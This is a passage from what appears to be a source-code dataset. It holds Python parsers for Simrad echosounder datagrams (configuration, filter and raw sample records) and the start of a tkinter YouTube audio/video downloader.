ValueError(\n \"Found >1 transducer under 
a single transceiver channel!\"\n )\n else: # should only have 1 transducer\n tcvr_ch_xducer = tcvr_ch.find(\n \"Transducer\"\n ) # get Element of this xducer\n f_par = tcvr_ch_xducer.findall(\"FrequencyPar\")\n # Save calibration parameters\n if f_par:\n cal_par = {\n \"frequency\": np.array(\n [int(f.attrib[\"Frequency\"]) for f in f_par]\n ),\n \"gain\": np.array(\n [float(f.attrib[\"Gain\"]) for f in f_par]\n ),\n \"impedance\": np.array(\n [int(f.attrib[\"Impedance\"]) for f in f_par]\n ),\n \"phase\": np.array(\n [float(f.attrib[\"Phase\"]) for f in f_par]\n ),\n \"beamwidth_alongship\": np.array(\n [\n float(f.attrib[\"BeamWidthAlongship\"])\n for f in f_par\n ]\n ),\n \"beamwidth_athwartship\": np.array(\n [\n float(f.attrib[\"BeamWidthAthwartship\"])\n for f in f_par\n ]\n ),\n \"angle_offset_alongship\": np.array(\n [\n float(f.attrib[\"AngleOffsetAlongship\"])\n for f in f_par\n ]\n ),\n \"angle_offset_athwartship\": np.array(\n [\n float(f.attrib[\"AngleOffsetAthwartship\"])\n for f in f_par\n ]\n ),\n }\n data[\"configuration\"][channel_id][\n \"calibration\"\n ] = cal_par\n # add the transducer data to the config dict\n dict_to_dict(\n tcvr_ch_xducer.attrib,\n data[\"configuration\"][channel_id],\n self.transducer_parsing_options,\n )\n\n # get unique transceiver channel number stored in channel_id\n tcvr_ch_num = TCVR_CH_NUM_MATCHER.search(channel_id)[0]\n\n # parse the Transducers section from the root\n # TODO Remove Transducers if doesnt exist\n xducer = root.find(\"Transducers\")\n if xducer is not None:\n # built occurrence lookup table for transducer name\n xducer_name_list = []\n for xducer_ch in xducer.iter(\"Transducer\"):\n xducer_name_list.append(\n xducer_ch.attrib[\"TransducerName\"]\n )\n\n # find matching transducer for this channel_id\n match_found = False\n for xducer_ch in xducer.iter(\"Transducer\"):\n if not match_found:\n xducer_ch_xml = xducer_ch.attrib\n match_name = (\n xducer_ch.attrib[\"TransducerName\"]\n == tcvr_ch_xducer.attrib[\"TransducerName\"]\n )\n if xducer_ch.attrib[\"TransducerSerialNumber\"] == \"\":\n match_sn = False\n else:\n match_sn = (\n xducer_ch.attrib[\"TransducerSerialNumber\"]\n == tcvr_ch_xducer.attrib[\"SerialNumber\"]\n )\n match_tcvr = (\n tcvr_ch_num\n in xducer_ch.attrib[\"TransducerCustomName\"]\n )\n\n # if find match add the transducer mounting details\n if (\n Counter(xducer_name_list)[\n xducer_ch.attrib[\"TransducerName\"]\n ]\n > 1\n ):\n # if more than one transducer has the same name\n # only check sn and transceiver unique number\n match_found = match_sn or match_tcvr\n else:\n match_found = (\n match_name or match_sn or match_tcvr\n )\n\n # add transducer mounting details\n if match_found:\n dict_to_dict(\n xducer_ch_xml,\n data[\"configuration\"][channel_id],\n self.transducer_parsing_options,\n )\n\n # add the header data to the config dict\n h = root.find(\"Header\")\n dict_to_dict(\n h.attrib,\n data[\"configuration\"][channel_id],\n self.header_parsing_options,\n )\n\n elif data[\"subtype\"] == \"parameter\":\n\n # parse the parameter XML datagram\n for h in root.iter(\"Channel\"):\n parm_xml = h.attrib\n # add the data to the environment dict\n dict_to_dict(\n parm_xml, data[\"parameter\"], self.parameter_parsing_options\n )\n\n elif data[\"subtype\"] == \"environment\":\n\n # parse the environment XML datagram\n for h in root.iter(\"Environment\"):\n env_xml = h.attrib\n # add the data to the environment dict\n dict_to_dict(\n env_xml, data[\"environment\"], self.environment_parsing_options\n )\n\n for 
h in root.iter(\"Transducer\"):\n transducer_xml = h.attrib\n # add the data to the environment dict\n dict_to_dict(\n transducer_xml,\n data[\"environment\"],\n self.envxdcr_parsing_options,\n )\n\n data[\"xml\"] = xml_string\n return data\n\n def _pack_contents(self, data, version):\n def to_CamelCase(xml_param):\n \"\"\"\n convert name from project's convention to CamelCase for converting back to\n XML to in Kongsberg's convention.\n \"\"\"\n idx = list(reversed([i for i, c in enumerate(xml_param) if c.isupper()]))\n param_len = len(xml_param)\n for i in idx:\n # check if we should insert an underscore\n if idx > 0 and idx < param_len - 1:\n xml_param = xml_param[:idx] + \"_\" + xml_param[idx:]\n xml_param = xml_param.lower()\n\n return xml_param\n\n datagram_fmt = self.header_fmt(version)\n datagram_contents = []\n\n if version == 0:\n\n for field in self.header_fields(version):\n datagram_contents.append(data[field])\n\n if data[\"nmea_string\"][-1] != \"\\x00\":\n tmp_string = data[\"nmea_string\"] + \"\\x00\"\n else:\n tmp_string = data[\"nmea_string\"]\n\n # Pad with more nulls to 4-byte word boundry if necessary\n if len(tmp_string) % 4:\n tmp_string += \"\\x00\" * (4 - (len(tmp_string) % 4))\n\n datagram_fmt += \"%ds\" % (len(tmp_string))\n\n # Convert to python string if needed\n if isinstance(tmp_string, str):\n tmp_string = tmp_string.encode(\"ascii\", errors=\"replace\")\n\n datagram_contents.append(tmp_string)\n\n return struct.pack(datagram_fmt, *datagram_contents)\n\n\nclass SimradFILParser(_SimradDatagramParser):\n \"\"\"\n EK80 FIL datagram contains the following keys:\n\n\n type: string == 'FIL1'\n low_date: long uint representing LSBytes of 64bit NT date\n high_date: long uint representing MSBytes of 64bit NT date\n timestamp: datetime.datetime object of NT date, assumed to be UTC\n stage: int\n channel_id: string\n n_coefficients: int\n decimation_factor: int\n coefficients: np.complex64\n\n The following methods are defined:\n\n from_string(str): parse a raw EK80 FIL datagram\n (with leading/trailing datagram size stripped)\n\n to_string(): Returns the datagram as a raw string\n (including leading/trailing size fields)\n ready for writing to disk\n \"\"\"\n\n def __init__(self):\n headers = {\n 1: [\n (\"type\", \"4s\"),\n (\"low_date\", \"L\"),\n (\"high_date\", \"L\"),\n (\"stage\", \"h\"),\n (\"spare\", \"2s\"),\n (\"channel_id\", \"128s\"),\n (\"n_coefficients\", \"h\"),\n (\"decimation_factor\", \"h\"),\n ]\n }\n\n _SimradDatagramParser.__init__(self, \"FIL\", headers)\n\n def _unpack_contents(self, raw_string, bytes_read, version):\n\n data = {}\n header_values = struct.unpack(\n self.header_fmt(version), raw_string[: self.header_size(version)]\n )\n\n for indx, field in enumerate(self.header_fields(version)):\n data[field] = header_values[indx]\n\n # handle Python 3 strings\n if (sys.version_info.major > 2) and isinstance(data[field], bytes):\n data[field] = data[field].decode(\"latin_1\")\n\n data[\"timestamp\"] = nt_to_unix((data[\"low_date\"], data[\"high_date\"]))\n data[\"bytes_read\"] = bytes_read\n\n if version == 1:\n # clean up the channel ID\n data[\"channel_id\"] = data[\"channel_id\"].strip(\"\\x00\")\n\n # unpack the coefficients\n indx = self.header_size(version)\n block_size = data[\"n_coefficients\"] * 8\n data[\"coefficients\"] = np.frombuffer(\n raw_string[indx : indx + block_size], dtype=\"complex64\" # noqa\n )\n\n return data\n\n def _pack_contents(self, data, version):\n\n datagram_fmt = self.header_fmt(version)\n datagram_contents = 
[]\n\n if version == 0:\n\n pass\n\n elif version == 1:\n for field in self.header_fields(version):\n datagram_contents.append(data[field])\n\n datagram_fmt += \"%ds\" % (len(data[\"beam_config\"]))\n datagram_contents.append(data[\"beam_config\"])\n\n return struct.pack(datagram_fmt, *datagram_contents)\n\n\nclass SimradConfigParser(_SimradDatagramParser):\n \"\"\"\n Simrad Configuration Datagram parser operates on dictionaries with the following keys:\n\n type: string == 'CON0'\n low_date: long uint representing LSBytes of 64bit NT date\n high_date: long uint representing MSBytes of 64bit NT date\n timestamp: datetime.datetime object of NT date, assumed to be UTC\n\n survey_name [str]\n transect_name [str]\n sounder_name [str]\n version [str]\n spare0 [str]\n transceiver_count [long]\n transceivers [list] List of dicts representing Transducer Configs:\n\n ME70 Data contains the following additional values (data contained w/in first 14\n bytes of the spare0 field)\n\n multiplexing [short] Always 0\n time_bias [long] difference between UTC and local time in min.\n sound_velocity_avg [float] [m/s]\n sound_velocity_transducer [float] [m/s]\n beam_config [str] Raw XML string containing beam config. info\n\n\n Transducer Config Keys (ER60/ES60/ES70 sounders):\n channel_id [str] channel ident string\n beam_type [long] Type of channel (0 = Single, 1 = Split)\n frequency [float] channel frequency\n equivalent_beam_angle [float] dB\n beamwidth_alongship [float]\n beamwidth_athwartship [float]\n angle_sensitivity_alongship [float]\n angle_sensitivity_athwartship [float]\n angle_offset_alongship [float]\n angle_offset_athwartship [float]\n pos_x [float]\n pos_y [float]\n pos_z [float]\n dir_x [float]\n dir_y [float]\n dir_z [float]\n pulse_length_table [float[5]]\n spare1 [str]\n gain_table [float[5]]\n spare2 [str]\n sa_correction_table [float[5]]\n spare3 [str]\n gpt_software_version [str]\n spare4 [str]\n\n Transducer Config Keys (ME70 sounders):\n channel_id [str] channel ident string\n beam_type [long] Type of channel (0 = Single, 1 = Split)\n reserved1 [float] channel frequency\n equivalent_beam_angle [float] dB\n beamwidth_alongship [float]\n beamwidth_athwartship [float]\n angle_sensitivity_alongship [float]\n angle_sensitivity_athwartship [float]\n angle_offset_alongship [float]\n angle_offset_athwartship [float]\n pos_x [float]\n pos_y [float]\n pos_z [float]\n beam_steering_angle_alongship [float]\n beam_steering_angle_athwartship [float]\n beam_steering_angle_unused [float]\n pulse_length [float]\n reserved2 [float]\n spare1 [str]\n gain [float]\n reserved3 [float]\n spare2 [str]\n sa_correction [float]\n reserved4 [float]\n spare3 [str]\n gpt_software_version [str]\n spare4 [str]\n\n from_string(str): parse a raw config datagram\n (with leading/trailing datagram size stripped)\n\n to_string(dict): Returns raw string (including leading/trailing size fields)\n ready for writing to disk\n \"\"\"\n\n COMMON_KEYS = [\n (\"channel_id\", \"128s\"),\n (\"beam_type\", \"l\"),\n (\"frequency\", \"f\"),\n (\"gain\", \"f\"),\n (\"equivalent_beam_angle\", \"f\"),\n (\"beamwidth_alongship\", \"f\"),\n (\"beamwidth_athwartship\", \"f\"),\n (\"angle_sensitivity_alongship\", \"f\"),\n (\"angle_sensitivity_athwartship\", \"f\"),\n (\"angle_offset_alongship\", \"f\"),\n (\"angle_offset_athwartship\", \"f\"),\n (\"pos_x\", \"f\"),\n (\"pos_y\", \"f\"),\n (\"pos_z\", \"f\"),\n (\"dir_x\", \"f\"),\n (\"dir_y\", \"f\"),\n (\"dir_z\", \"f\"),\n (\"pulse_length_table\", \"5f\"),\n (\"spare1\", \"8s\"),\n 
(\"gain_table\", \"5f\"),\n (\"spare2\", \"8s\"),\n (\"sa_correction_table\", \"5f\"),\n (\"spare3\", \"8s\"),\n (\"gpt_software_version\", \"16s\"),\n (\"spare4\", \"28s\"),\n ]\n\n def __init__(self):\n headers = {\n 0: [\n (\"type\", \"4s\"),\n (\"low_date\", \"L\"),\n (\"high_date\", \"L\"),\n (\"survey_name\", \"128s\"),\n (\"transect_name\", \"128s\"),\n (\"sounder_name\", \"128s\"),\n (\"version\", \"30s\"),\n (\"spare0\", \"98s\"),\n (\"transceiver_count\", \"l\"),\n ],\n 1: [(\"type\", \"4s\"), (\"low_date\", \"L\"), (\"high_date\", \"L\")],\n }\n\n _SimradDatagramParser.__init__(self, \"CON\", headers)\n\n self._transducer_headers = {\n \"ER60\": self.COMMON_KEYS,\n \"ES60\": self.COMMON_KEYS,\n \"ES70\": self.COMMON_KEYS,\n \"MBES\": [\n (\"channel_id\", \"128s\"),\n (\"beam_type\", \"l\"),\n (\"frequency\", \"f\"),\n (\"reserved1\", \"f\"),\n (\"equivalent_beam_angle\", \"f\"),\n (\"beamwidth_alongship\", \"f\"),\n (\"beamwidth_athwartship\", \"f\"),\n (\"angle_sensitivity_alongship\", \"f\"),\n (\"angle_sensitivity_athwartship\", \"f\"),\n (\"angle_offset_alongship\", \"f\"),\n (\"angle_offset_athwartship\", \"f\"),\n (\"pos_x\", \"f\"),\n (\"pos_y\", \"f\"),\n (\"pos_z\", \"f\"),\n (\"beam_steering_angle_alongship\", \"f\"),\n (\"beam_steering_angle_athwartship\", \"f\"),\n (\"beam_steering_angle_unused\", \"f\"),\n (\"pulse_length\", \"f\"),\n (\"reserved2\", \"f\"),\n (\"spare1\", \"20s\"),\n (\"gain\", \"f\"),\n (\"reserved3\", \"f\"),\n (\"spare2\", \"20s\"),\n (\"sa_correction\", \"f\"),\n (\"reserved4\", \"f\"),\n (\"spare3\", \"20s\"),\n (\"gpt_software_version\", \"16s\"),\n (\"spare4\", \"28s\"),\n ],\n }\n\n def _unpack_contents(self, raw_string, bytes_read, version):\n\n data = {}\n round6 = lambda x: round(x, ndigits=6) # noqa\n header_values = struct.unpack(\n self.header_fmt(version), raw_string[: self.header_size(version)]\n )\n\n for indx, field in enumerate(self.header_fields(version)):\n data[field] = header_values[indx]\n\n # handle Python 3 strings\n if (sys.version_info.major > 2) and isinstance(data[field], bytes):\n data[field] = data[field].decode(\"latin_1\")\n\n data[\"timestamp\"] = nt_to_unix((data[\"low_date\"], data[\"high_date\"]))\n data[\"bytes_read\"] = bytes_read\n\n if version == 0:\n\n data[\"transceivers\"] = {}\n\n for field in [\"transect_name\", \"version\", \"survey_name\", \"sounder_name\"]:\n data[field] = data[field].strip(\"\\x00\")\n\n sounder_name = data[\"sounder_name\"]\n if sounder_name == \"MBES\":\n _me70_extra_values = struct.unpack(\"=hLff\", data[\"spare0\"][:14])\n data[\"multiplexing\"] = _me70_extra_values[0]\n data[\"time_bias\"] = _me70_extra_values[1]\n data[\"sound_velocity_avg\"] = _me70_extra_values[2]\n data[\"sound_velocity_transducer\"] = _me70_extra_values[3]\n data[\"spare0\"] = data[\"spare0\"][:14] + data[\"spare0\"][14:].strip(\"\\x00\")\n\n else:\n data[\"spare0\"] = data[\"spare0\"].strip(\"\\x00\")\n\n buf_indx = self.header_size(version)\n\n try:\n transducer_header = self._transducer_headers[sounder_name]\n _sounder_name_used = sounder_name\n except KeyError:\n log.warning(\n \"Unknown sounder_name: %s, (no one of %s)\",\n sounder_name,\n list(self._transducer_headers.keys()),\n )\n log.warning(\"Will use ER60 transducer config fields as default\")\n\n transducer_header = self._transducer_headers[\"ER60\"]\n _sounder_name_used = \"ER60\"\n\n txcvr_header_fields = [x[0] for x in transducer_header]\n txcvr_header_fmt = \"=\" + \"\".join([x[1] for x in transducer_header])\n txcvr_header_size = 
struct.calcsize(txcvr_header_fmt)\n\n for txcvr_indx in range(1, data[\"transceiver_count\"] + 1):\n txcvr_header_values_encoded = struct.unpack(\n txcvr_header_fmt,\n raw_string[buf_indx : buf_indx + txcvr_header_size], # noqa\n )\n txcvr_header_values = list(txcvr_header_values_encoded)\n for tx_idx, tx_val in enumerate(txcvr_header_values_encoded):\n if isinstance(tx_val, bytes):\n txcvr_header_values[tx_idx] = tx_val.decode(\"latin_1\")\n\n txcvr = data[\"transceivers\"].setdefault(txcvr_indx, {})\n\n if _sounder_name_used in [\"ER60\", \"ES60\", \"ES70\"]:\n for txcvr_field_indx, field in enumerate(txcvr_header_fields[:17]):\n txcvr[field] = txcvr_header_values[txcvr_field_indx]\n\n txcvr[\"pulse_length_table\"] = np.fromiter(\n list(map(round6, txcvr_header_values[17:22])), \"float\"\n )\n txcvr[\"spare1\"] = txcvr_header_values[22]\n txcvr[\"gain_table\"] = np.fromiter(\n list(map(round6, txcvr_header_values[23:28])), \"float\"\n )\n txcvr[\"spare2\"] = txcvr_header_values[28]\n txcvr[\"sa_correction_table\"] = np.fromiter(\n list(map(round6, txcvr_header_values[29:34])), \"float\"\n )\n txcvr[\"spare3\"] = txcvr_header_values[34]\n txcvr[\"gpt_software_version\"] = txcvr_header_values[35]\n txcvr[\"spare4\"] = txcvr_header_values[36]\n\n elif _sounder_name_used == \"MBES\":\n for txcvr_field_indx, field in enumerate(txcvr_header_fields):\n txcvr[field] = txcvr_header_values[txcvr_field_indx]\n\n else:\n raise RuntimeError(\n \"Unknown _sounder_name_used (Should not happen, this is a bug!)\"\n )\n\n txcvr[\"channel_id\"] = txcvr[\"channel_id\"].strip(\"\\x00\")\n txcvr[\"spare1\"] = txcvr[\"spare1\"].strip(\"\\x00\")\n txcvr[\"spare2\"] = txcvr[\"spare2\"].strip(\"\\x00\")\n txcvr[\"spare3\"] = txcvr[\"spare3\"].strip(\"\\x00\")\n txcvr[\"spare4\"] = txcvr[\"spare4\"].strip(\"\\x00\")\n txcvr[\"gpt_software_version\"] = txcvr[\"gpt_software_version\"].strip(\n \"\\x00\"\n )\n\n buf_indx += txcvr_header_size\n\n elif version == 1:\n # CON1 only has a single data field: beam_config, holding an xml string\n data[\"beam_config\"] = raw_string[self.header_size(version) :].strip(\"\\x00\")\n\n return data\n\n def _pack_contents(self, data, version):\n\n datagram_fmt = self.header_fmt(version)\n datagram_contents = []\n\n if version == 0:\n\n if data[\"transceiver_count\"] != len(data[\"transceivers\"]):\n log.warning(\n \"Mismatch between 'transceiver_count' and actual # of transceivers\"\n )\n data[\"transceiver_count\"] = len(data[\"transceivers\"])\n\n sounder_name = data[\"sounder_name\"]\n if sounder_name == \"MBES\":\n _packed_me70_values = struct.pack(\n \"=hLff\",\n data[\"multiplexing\"],\n data[\"time_bias\"],\n data[\"sound_velocity_avg\"],\n data[\"sound_velocity_transducer\"],\n )\n data[\"spare0\"] = _packed_me70_values + data[\"spare0\"][14:]\n\n for field in self.header_fields(version):\n datagram_contents.append(data[field])\n\n try:\n transducer_header = self._transducer_headers[sounder_name]\n _sounder_name_used = sounder_name\n except KeyError:\n log.warning(\n \"Unknown sounder_name: %s, (no one of %s)\",\n sounder_name,\n list(self._transducer_headers.keys()),\n )\n log.warning(\"Will use ER60 transducer config fields as default\")\n\n transducer_header = self._transducer_headers[\"ER60\"]\n _sounder_name_used = \"ER60\"\n\n txcvr_header_fields = [x[0] for x in transducer_header]\n txcvr_header_fmt = \"=\" + \"\".join([x[1] for x in transducer_header])\n txcvr_header_size = struct.calcsize(txcvr_header_fmt) # noqa\n\n for txcvr_indx, txcvr in 
list(data[\"transceivers\"].items()):\n txcvr_contents = []\n\n if _sounder_name_used in [\"ER60\", \"ES60\", \"ES70\"]:\n for field in txcvr_header_fields[:17]:\n txcvr_contents.append(txcvr[field])\n\n txcvr_contents.extend(txcvr[\"pulse_length_table\"])\n txcvr_contents.append(txcvr[\"spare1\"])\n\n txcvr_contents.extend(txcvr[\"gain_table\"])\n txcvr_contents.append(txcvr[\"spare2\"])\n\n txcvr_contents.extend(txcvr[\"sa_correction_table\"])\n txcvr_contents.append(txcvr[\"spare3\"])\n\n txcvr_contents.extend(\n [txcvr[\"gpt_software_version\"], txcvr[\"spare4\"]]\n )\n\n txcvr_contents_str = struct.pack(txcvr_header_fmt, *txcvr_contents)\n\n elif _sounder_name_used == \"MBES\":\n for field in txcvr_header_fields:\n txcvr_contents.append(txcvr[field])\n\n txcvr_contents_str = struct.pack(txcvr_header_fmt, *txcvr_contents)\n\n else:\n raise RuntimeError(\n \"Unknown _sounder_name_used (Should not happen, this is a bug!)\"\n )\n\n datagram_fmt += \"%ds\" % (len(txcvr_contents_str))\n datagram_contents.append(txcvr_contents_str)\n\n elif version == 1:\n for field in self.header_fields(version):\n datagram_contents.append(data[field])\n\n datagram_fmt += \"%ds\" % (len(data[\"beam_config\"]))\n datagram_contents.append(data[\"beam_config\"])\n\n return struct.pack(datagram_fmt, *datagram_contents)\n\n\nclass SimradRawParser(_SimradDatagramParser):\n \"\"\"\n Sample Data Datagram parser operates on dictonaries with the following keys:\n\n type: string == 'RAW0'\n low_date: long uint representing LSBytes of 64bit NT date\n high_date: long uint representing MSBytes of 64bit NT date\n timestamp: datetime.datetime object of NT date, assumed to be UTC\n\n channel [short] Channel number\n mode [short] 1 = Power only, 2 = Angle only 3 = Power & Angle\n transducer_depth [float]\n frequency [float]\n transmit_power [float]\n pulse_length [float]\n bandwidth [float]\n sample_interval [float]\n sound_velocity [float]\n absorption_coefficient [float]\n heave [float]\n roll [float]\n pitch [float]\n temperature [float]\n heading [float]\n transmit_mode [short] 0 = Active, 1 = Passive, 2 = Test, -1 = Unknown\n spare0 [str]\n offset [long]\n count [long]\n\n power [numpy array] Unconverted power values (if present)\n angle [numpy array] Unconverted angle values (if present)\n\n from_string(str): parse a raw sample datagram\n (with leading/trailing datagram size stripped)\n\n to_string(dict): Returns raw string (including leading/trailing size fields)\n ready for writing to disk\n \"\"\"\n\n def __init__(self):\n headers = {\n 0: [\n (\"type\", \"4s\"),\n (\"low_date\", \"L\"),\n (\"high_date\", \"L\"),\n (\"channel\", \"h\"),\n (\"mode\", \"h\"),\n (\"transducer_depth\", \"f\"),\n (\"frequency\", \"f\"),\n (\"transmit_power\", \"f\"),\n (\"pulse_length\", \"f\"),\n (\"bandwidth\", \"f\"),\n (\"sample_interval\", \"f\"),\n (\"sound_velocity\", \"f\"),\n (\"absorption_coefficient\", \"f\"),\n (\"heave\", \"f\"),\n (\"roll\", \"f\"),\n (\"pitch\", \"f\"),\n (\"temperature\", \"f\"),\n (\"heading\", \"f\"),\n (\"transmit_mode\", \"h\"),\n (\"spare0\", \"6s\"),\n (\"offset\", \"l\"),\n (\"count\", \"l\"),\n ],\n 3: [\n (\"type\", \"4s\"),\n (\"low_date\", \"L\"),\n (\"high_date\", \"L\"),\n (\"channel_id\", \"128s\"),\n (\"data_type\", \"h\"),\n (\"spare\", \"2s\"),\n (\"offset\", \"l\"),\n (\"count\", \"l\"),\n ],\n }\n _SimradDatagramParser.__init__(self, \"RAW\", headers)\n\n def _unpack_contents(self, raw_string, bytes_read, version):\n\n header_values = struct.unpack(\n self.header_fmt(version), 
raw_string[: self.header_size(version)]\n )\n\n data = {}\n\n for indx, field in enumerate(self.header_fields(version)):\n data[field] = header_values[indx]\n if isinstance(data[field], bytes):\n data[field] = data[field].decode()\n\n data[\"timestamp\"] = nt_to_unix((data[\"low_date\"], data[\"high_date\"]))\n data[\"bytes_read\"] = bytes_read\n\n if version == 0:\n\n if data[\"count\"] > 0:\n block_size = data[\"count\"] * 2\n indx = self.header_size(version)\n\n if int(data[\"mode\"]) & 0x1:\n data[\"power\"] = np.frombuffer(\n raw_string[indx : indx + block_size], dtype=\"int16\" # noqa\n )\n indx += block_size\n else:\n data[\"power\"] = None\n\n if int(data[\"mode\"]) & 0x2:\n data[\"angle\"] = np.frombuffer(\n raw_string[indx : indx + block_size], dtype=\"int8\" # noqa\n )\n data[\"angle\"] = data[\"angle\"].reshape((-1, 2))\n else:\n data[\"angle\"] = None\n\n else:\n data[\"power\"] = np.empty((0,), dtype=\"int16\")\n data[\"angle\"] = np.empty((0, 2), dtype=\"int8\")\n\n elif version == 3:\n\n # result = 1j*Data[...,1]; result += Data[...,0]\n\n # clean up the channel ID\n data[\"channel_id\"] = data[\"channel_id\"].strip(\"\\x00\")\n\n if data[\"count\"] > 0:\n\n # set the initial block size and indx value.\n block_size = data[\"count\"] * 2\n indx = self.header_size(version)\n\n if data[\"data_type\"] & 0b1:\n data[\"power\"] = np.frombuffer(\n raw_string[indx : indx + block_size], dtype=\"int16\" # noqa\n )\n indx += block_size\n else:\n data[\"power\"] = None\n\n if data[\"data_type\"] & 0b10:\n data[\"angle\"] = np.frombuffer(\n raw_string[indx : indx + block_size], dtype=\"int8\" # noqa\n )\n data[\"angle\"] = data[\"angle\"].reshape((-1, 2))\n indx += block_size\n else:\n data[\"angle\"] = None\n\n # determine the complex sample data type - this is contained in bits 2 and 3\n # of the datatype value. I'm assuming the types are exclusive...\n data[\"complex_dtype\"] = np.float16\n type_bytes = 2\n if data[\"data_type\"] & 0b1000:\n data[\"complex_dtype\"] = np.float32\n type_bytes = 8\n\n # determine the number of complex samples\n data[\"n_complex\"] = data[\"data_type\"] >> 8\n\n # unpack the complex samples\n if data[\"n_complex\"] > 0:\n # determine the block size\n block_size = data[\"count\"] * data[\"n_complex\"] * type_bytes\n\n data[\"complex\"] = np.frombuffer(\n raw_string[indx : indx + block_size], # noqa\n dtype=data[\"complex_dtype\"],\n )\n data[\"complex\"].dtype = np.complex64\n else:\n data[\"complex\"] = None\n\n else:\n data[\"power\"] = np.empty((0,), dtype=\"int16\")\n data[\"angle\"] = np.empty((0,), dtype=\"int8\")\n data[\"complex\"] = np.empty((0,), dtype=\"complex64\")\n data[\"n_complex\"] = 0\n\n return data\n\n def _pack_contents(self, data, version):\n\n datagram_fmt = self.header_fmt(version)\n\n datagram_contents = []\n\n if version == 0:\n\n if data[\"count\"] > 0:\n if (int(data[\"mode\"]) & 0x1) and (\n len(data.get(\"power\", [])) != data[\"count\"]\n ):\n log.warning(\n \"Data 'count' = %d, but contains %d power samples. Ignoring power.\"\n )\n data[\"mode\"] &= ~(1 << 0)\n\n if (int(data[\"mode\"]) & 0x2) and (\n len(data.get(\"angle\", [])) != data[\"count\"]\n ):\n log.warning(\n \"Data 'count' = %d, but contains %d angle samples. Ignoring angle.\"\n )\n data[\"mode\"] &= ~(1 << 1)\n\n if data[\"mode\"] == 0:\n log.warning(\n \"Data 'count' = %d, but mode == 0. 
Setting count to 0\",\n data[\"count\"],\n )\n data[\"count\"] = 0\n\n for field in self.header_fields(version):\n datagram_contents.append(data[field])\n\n if data[\"count\"] > 0:\n\n if int(data[\"mode\"]) & 0x1:\n datagram_fmt += \"%dh\" % (data[\"count\"])\n datagram_contents.extend(data[\"power\"])\n\n if int(data[\"mode\"]) & 0x2:\n datagram_fmt += \"%dH\" % (data[\"count\"])\n datagram_contents.extend(data[\"angle\"])\n\n return struct.pack(datagram_fmt, *datagram_contents)\n"} {"ext": "pyw", "sha": "1a301d4cdf3f0000f2f0525ab19727244bd43bae", "content": "import os\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import filedialog\nfrom tkinter import PhotoImage\nfrom tkinter import messagebox\n\nimport pafy\nimport youtube_dl\n\n# if you get api limit exceeded error, get an api key and paste\n# here as a string value\n# pafy.set_api_key(key)\n\n# sample video url\n# https://www.youtube.com/watch?v=CjeYOtL6ORE\n\ncwd = os.getcwd()\n\nclass CustomEntry(tk.Entry):\n\tdef __init__(self, parent, *args, **kwargs):\n\t\ttk.Entry.__init__(self, parent, *args, **kwargs)\n\t\tself.parent = parent\n\t\tself.bind('', self.add_placeholder)\n\t\tself.bind('', self.clear_placeholder)\n\n\t\tself.configure(fg=\"gray70\")\n\t\tself.insert(0, 'Enter Video URL')\n\n\tdef add_placeholder(self, event=None):\n\t\tif not self.get():\n\t\t\tself.configure(fg=\"gray70\")\n\t\t\tself.insert(0, 'Enter Video URL')\n\n\tdef clear_placeholder(self, event):\n\t\tif event and self.get() == 'Enter Video URL':\n\t\t\tself.delete('0', 'end')\n\t\t\tself.configure(fg=\"black\")\n\n# Application Class -----------------------------------------------\n\nclass Application(tk.Frame):\n\tdef __init__(self, master=None):\n\t\tsuper().__init__(master=master)\n\t\tself.master = master\n\t\tself.master.focus_set()\n\t\tself.pack()\n\n\t\tself.url = ''\n\t\tself.video_quality = tk.StringVar()\n\t\tself.filesize = 0\n\n\t\tself.is_video_downloading = False\n\t\tself.is_audio_downloading = False\n\n\t\tself.draw_title_frame()\n\t\tself.draw_main_frame()\n\n\t\tself.bind('', self.search_video)\n\n\tdef draw_title_frame(self):\n\t\tself.title_frame = tk.Frame(self, bg='red', width=440, height=60)\n\t\tself.title_frame.grid(row=0, column=0, columnspan=5, pady=5)\n\t\tself.title_frame.grid_propagate(False)\n\t\tself.title = tk.Label(self.title_frame, text=' SaveFromYT - Youtube Audio/Video Downloader',\n\t\t\t\t\t\t\tfg='white', bg='red', font=('Times', 14),\n\t\t\t\t\t\t\twidth=450, height=50, image=youtube_icon, compound=tk.LEFT,\n\t\t\t\t\t\t\tanchor = 'w')\n\t\tself.title.grid(row=0, column=0, padx=5, ipadx=20)\n\n\tdef draw_main_frame(self):\n\t\tself.main_frame = tk.Frame(self, width=440, height=240, highlightthickness=1,\n\t\t\t\t\t\t\thighlightbackground='red')\n\t\tself.main_frame.grid(row=1, column=0, columnspan=5, pady=5, rowspan=3)\n\t\tself.main_frame.grid_propagate(False)\n\n\t\tself.entry = CustomEntry(self.main_frame, width=52)\n\t\tself.entry.grid(row=0, column=0, columnspan=3, pady=100, padx=(20,10))\n\t\tself.entry.bind('', self.search_video)\n\n\t\tself.search = tk.Button(self.main_frame, image=search_icon, \n\t\t\t\t\t\t\tfg='white', cursor='hand2', command=self.search_video,\n\t\t\t\t\t\t\trelief=tk.FLAT)\n\t\tself.search.grid(row=0, column=4, pady=100, padx=(30,10))\n\n\tdef draw_download_frame(self):\n\t\tself.main_frame.destroy()\n\n\t\tself.info_frame = tk.Frame(self, width=150, height=173, highlightthickness=1,\n\t\t\t\t\t\t\thighlightbackground='red')\n\t\tself.info_frame.grid(row=1, column=0, 
columnspan=2)\n\t\tself.info_frame.grid_propagate(False)\n\n\t\tself.video_frame = tk.Frame(self, width=290, height=173, highlightthickness=1,\n\t\t\t\t\t\t\thighlightbackground='red')\n\t\tself.video_frame.grid(row=1, column=2, columnspan=3)\n\t\tself.video_frame.grid_propagate(False)\n\n\t\tself.audio_frame = tk.Frame(self, width=370, height=67, highlightthickness=1,\n\t\t\t\t\t\t\thighlightbackground='red')\n\t\tself.audio_frame.grid(row=2, column=0, columnspan=4)\n\t\tself.audio_frame.grid_propagate(False)\n\n\t\tself.back_frame = tk.Frame(self, width=70, height=67, highlightthickness=1,\n\t\t\t\t\t\t\thighlightbackground='red')\n\t\tself.back_frame.grid(row=2, column=4)\n\t\tself.back_frame.grid_propagate(False)\n\n\tdef draw_download_widgets(self):\n\t\t# self.info_frame\n\n\t\tself.title = tk.Label(self.info_frame, width=20, height=3, bg='red',\n\t\t\t\t\twraplength=120, fg='white')\n\t\tself.title.grid(row=0, column=0, padx=1, pady=2)\n\n\t\tself.views = tk.Label(self.info_frame, width=20, height=2, bg='red',\n\t\t\t\t\tfg='white')\n\t\tself.views.grid(row=1, column=0, padx=1, pady=1)\n\n\t\tself.duration = tk.Label(self.info_frame, width=20, height=2, 